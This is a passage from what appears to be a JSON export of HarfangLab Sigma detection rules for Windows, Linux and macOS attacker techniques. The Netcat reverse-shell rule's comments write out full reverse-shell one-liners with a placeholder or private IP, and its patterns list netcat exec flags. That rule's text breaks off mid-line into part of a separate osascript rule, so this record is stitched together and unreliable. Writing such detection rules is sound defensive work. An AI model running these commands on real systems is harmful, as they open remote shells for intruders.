"content": "title: DLL Hijacking via fvenotify.exe\nid: f2d6929c-142d-40dc-8ad3-c9a26eb24032\ndescription: |\n Detects potential Windows DLL Hijacking via fvenotify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fvenotify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f2d6929c-142d-40dc-8ad3-c9a26eb24032",
"rule_name": "DLL Hijacking via fvenotify.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fvenotify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2ec73c6-8e51-4470-918d-f2e73ffe58be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620310Z",
"creation_date": "2026-03-23T11:45:34.620312Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620317Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_taskmgr.yml",
"content": "title: TaskMgr Disabled\nid: f2ec73c6-8e51-4470-918d-f2e73ffe58be\ndescription: |\n Detects the disabling of the Windows Task Manager for a said user.\n Attackers can use this registry modification to prevent users from starting the task manager, either to hide malicious payload, or to prevent users from killing it.\n It is recommended to analyze the process responsible for the registry modification as well as to look for other malicious actions on the host.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_gpo_manual:\n ProcessParentCommandLine: '?:\\windows\\system32\\mmc.exe ?:\\windows\\system32\\gpmc.msc'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\configsecuritypolicy.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\msmpeng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_kiosk_mode:\n ProcessCommandLine: '?:\\Windows\\system32\\svchost.exe -k AssignedAccessManagerSvc -s AssignedAccessManagerSvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_userlock:\n ProcessOriginalFileName:\n - 'UlAgent.dll'\n - 'ULAgentExe.exe'\n ProcessSignature: 'IS Decisions SA'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_nomsecure:\n ProcessOriginalFileName: 'NomSecure.exe'\n\n exclusion_tsllksrv:\n ProcessImage:\n - '?:\\Windows\\System32\\TSLLkSrv.exe'\n - '?:\\Windows\\SysWOW64\\TSLLkSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Esm Software'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f2ec73c6-8e51-4470-918d-f2e73ffe58be",
"rule_name": "TaskMgr Disabled",
"rule_description": "Detects the disabling of the Windows Task Manager for a said user.\nAttackers can use this registry modification to prevent users from starting the task manager, either to hide malicious payload, or to prevent users from killing it.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2f5d12c-024a-40f1-9ee3-d10af0223d55",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613519Z",
"creation_date": "2026-03-23T11:45:34.613522Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613530Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://gtfobins.github.io/gtfobins/nc/",
"https://www.rufflabs.com/post/anatomy-of-reverse-shell-nc-pipe/",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_netcat_linux.yml",
"content": "title: Reverse Shell Executed via Netcat (Linux)\nid: f2f5d12c-024a-40f1-9ee3-d10af0223d55\ndescription: |\n Detects different suspicious usages of Netcat that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to ensure the legitimacy of this execution and of the destination IP.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://gtfobins.github.io/gtfobins/nc/\n - https://www.rufflabs.com/post/anatomy-of-reverse-shell-nc-pipe/\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/07/01\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Netcat\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_exec:\n Image|endswith:\n - '/nc'\n - '/nc.openbsd'\n - '/nc.traditional'\n - '/ncat'\n - '/ncat.openbsd'\n - '/ncat.traditional'\n - '/netcat'\n - '/netcat.openbsd'\n - '/netcat.traditional'\n CommandLine|contains: # TODO FIMXE: use regexp when available broadly\n - ' -e '\n - ' --exec '\n - ' --lua-exec '\n - ' -c '\n - ' --sh-exec '\n\n selection_fifo:\n CommandLine|contains:\n # mknod /tmp/backpipe p; /bin/sh /tmp/backpipe\n # mknod /tmp/backpipe p; /bin/sh '\n - 'mknod *sh*<*|*nc *|*tee'\n - 'mknod *sh*<*|*nc.*>'\n - 'mknod *sh*<*|*nc.*|*tee'\n - 'mknod *sh*<*|*netcat *>'\n - 'mknod *sh*<*|*netcat *|*tee'\n # mknod /tmp/backpipe p; nc 192.168.56.1 8888 /tmp/backpipe\n - 'mknod *nc *<*|*sh*-i*|*tee'\n - 'mknod *nc *<*|*sh*-i*>'\n - 'mknod *nc.*<*|*sh*-i*|*tee'\n - 'mknod *nc.*<*|*sh*-i*>'\n - 'mknod *netcat *<*|*sh*-i*|*tee'\n - 'mknod *netcat *<*|*sh*-i*>'\n # rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc IP PORT > /tmp/f\n - 'rm *mkfifo *cat *|*sh*-i*|*nc '\n - 'rm *mkfifo *cat *|*sh*-i*|*nc. '\n\n # Avoid false positive with script\n filter_newline:\n CommandLine|re: '.*\\n.*'\n\n exclusion_sap:\n ProcessGrandparentImage: '/usr/sap/hostctrl/exe/saposcol'\n CommandLine|contains: 'sapsysinfo.sh'\n\n # Yocto generates huge build commands that happen to match `selection_fifo` even though they aren't related\n exclusion_yocto_sdk:\n ParentImage: '/opt/yocto/*/usr/bin/make'\n\n exclusion_makefile:\n CommandLine|contains:\n - '#include ” password as string with administrator privileges’\n Image|endswith: '/osascript'\n CommandLine|contains|all:\n - 'user name'\n - 'password'\n - 'with administrator privileges'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4b41d25-ce02-42fb-890b-c714cded1173",
"rule_name": "User's Password Validated via osascript",
"rule_description": "Detects the execution of osacript to validate user's password.\nAdversaries may try to validate a user password by using it in an osascript command, for instance by creating a file as the specified user.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2024-10-18",
"rule_modified_date": "2025-01-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1059.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f4ca9000-4c9d-4df0-ab1e-b67efb6d5a38",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610158Z",
"creation_date": "2026-03-23T11:45:34.610162Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610170Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/",
"https://nvd.nist.gov/vuln/detail/CVE-2023-35359",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_suspicious_process_fhsvc.yml",
"content": "title: Suspicious Process Executed by the File History Service\nid: f4ca9000-4c9d-4df0-ab1e-b67efb6d5a38\ndescription: |\n Detects the execution of a process by the File History Service that may be a consequence of a local privilege escalation vulnerability exploitation (CVE-2023-35359).\n This vulnerability allows an attacker to make the File History load an arbitrary DLL as NT AUTHORITY\\\\SYSTEM, thus granting the attacker local SYSTEM privileges.\n It is recommended to analyze the DLLs loaded by the service as well as to look for traces of malicious behavior on the host.\n Remediative actions include quarantining the DLL, killing the launched process as well as isolating the host.\nreferences:\n - https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-35359\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/09/04\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-35359\n - classification.Windows.Exploit.Fhsvc\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc\n ProcessParentImage|endswith: '\\svchost.exe'\n ProcessParentCommandLine|contains: ' fhsvc'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\windows\\system32\\WerFault.exe'\n - '?:\\windows\\syswow64\\WerFault.exe'\n\n exclusion_svchost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files (x86)\\Citrix\\ICA Client\\concentr.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4ca9000-4c9d-4df0-ab1e-b67efb6d5a38",
"rule_name": "Suspicious Process Executed by the File History Service",
"rule_description": "Detects the execution of a process by the File History Service that may be a consequence of a local privilege escalation vulnerability exploitation (CVE-2023-35359).\nThis vulnerability allows an attacker to make the File History load an arbitrary DLL as NT AUTHORITY\\\\SYSTEM, thus granting the attacker local SYSTEM privileges.\nIt is recommended to analyze the DLLs loaded by the service as well as to look for traces of malicious behavior on the host.\nRemediative actions include quarantining the DLL, killing the launched process as well as isolating the host.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f4d321de-b05f-4628-bea8-6f93217fe8a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076754Z",
"creation_date": "2026-03-23T11:45:34.076756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_manage_bde.yml",
"content": "title: DLL Hijacking via manage-bde.exe\nid: f4d321de-b05f-4628-bea8-6f93217fe8a4\ndescription: |\n Detects potential Windows DLL Hijacking via manage-bde.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'manage-bde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4d321de-b05f-4628-bea8-6f93217fe8a4",
"rule_name": "DLL Hijacking via manage-bde.exe",
"rule_description": "Detects potential Windows DLL Hijacking via manage-bde.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f4dd90e7-abe2-4622-ba78-c21689675968",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601143Z",
"creation_date": "2026-03-23T11:45:34.601147Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_stordiag.yml",
"content": "title: DLL Hijacking via stordiag.exe\nid: f4dd90e7-abe2-4622-ba78-c21689675968\ndescription: |\n Detects potential Windows DLL Hijacking via stordiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'stordiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\CRYPTBASE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4dd90e7-abe2-4622-ba78-c21689675968",
"rule_name": "DLL Hijacking via stordiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via stordiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f4f62a4f-220c-4330-95c3-4ffae6a2c3ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070996Z",
"creation_date": "2026-03-23T11:45:34.070998Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071002Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Kostastsale/status/1570178125400776705",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_wermgr_execution_without_commandline_args.yml",
"content": "title: Suspicious wermgr.exe Execution\nid: f4f62a4f-220c-4330-95c3-4ffae6a2c3ec\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary wermgr.exe without command-line arguments.\n This technique has been used by QakBot in a September 2022 campaign in association with process hollowing.\n It is recommended to investigate the wermgr process as well as the process tree for suspicious activities.\nreferences:\n - https://twitter.com/Kostastsale/status/1570178125400776705\n - https://attack.mitre.org/techniques/T1055/\ndate: 2022/09/19\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\wermgr.exe'\n CommandLine|endswith:\n - '\\wermgr.exe'\n - '\\wermgr.exe '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4f62a4f-220c-4330-95c3-4ffae6a2c3ec",
"rule_name": "Suspicious wermgr.exe Execution",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary wermgr.exe without command-line arguments.\nThis technique has been used by QakBot in a September 2022 campaign in association with process hollowing.\nIt is recommended to investigate the wermgr process as well as the process tree for suspicious activities.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5003b31-b196-4dc3-a7b0-b83b839ad76a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071440Z",
"creation_date": "2026-03-23T11:45:34.071442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071446Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/10/22/persistence-time-providers/",
"https://attack.mitre.org/techniques/T1547/003/"
],
"name": "t1547_003_persistence_time_providers.yml",
